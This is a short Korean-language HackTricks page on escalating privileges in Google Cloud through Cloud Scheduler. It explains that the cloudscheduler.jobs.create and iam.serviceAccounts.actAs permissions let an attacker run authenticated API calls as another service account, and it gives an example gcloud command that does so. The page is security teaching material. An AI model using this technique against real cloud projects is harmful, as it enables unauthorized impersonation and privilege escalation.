GCP - Cloudscheduler Privesc

htARTE (HackTricks AWS Red Team Expert)을 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

cloudscheduler

cloudscheduler.jobs.create, iam.serviceAccounts.actAs, (cloudscheduler.locations.list)

이 권한을 가진 공격자는 Cloud Scheduler를 악용하여 특정 서비스 계정으로 cron 작업을 인증할 수 있습니다. HTTP POST 요청을 조작함으로써, 공격자는 Storage 버킷 생성과 같은 작업을 서비스 계정의 신원으로 실행할 수 있습니다. 이 방법은 스케줄러가 *.googleapis.com 엔드포인트를 대상으로하고 요청을 인증하는 능력을 활용하여, 공격자가 간단한 gcloud 명령을 사용하여 Google API 엔드포인트를 직접 조작할 수 있게 합니다.

예를 들어, 특정 서비스 계정을 사용하여 Storage 버킷을 생성하는 새 작업을 만들려면 다음 명령을 실행할 수 있습니다:

gcloud scheduler jobs create http test –schedule='* * * * *' –uri='https://storage.googleapis.com/storage/v1/b?project=<PROJECT-ID>' --message-body "{'name':'new-bucket-name'}" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com –headers Content-Type=application/json

권한 상승을 위해, 공격자는 원하는 API를 대상으로 하는 HTTP 요청을 조작하여 지정된 서비스 계정을 가장하는 것입니다.

참고 자료

htARTE (HackTricks AWS Red Team Expert)를 통해 제로에서 영웅까지 AWS 해킹을 배워보세요!

HackTricks를 지원하는 다른 방법:

最終更新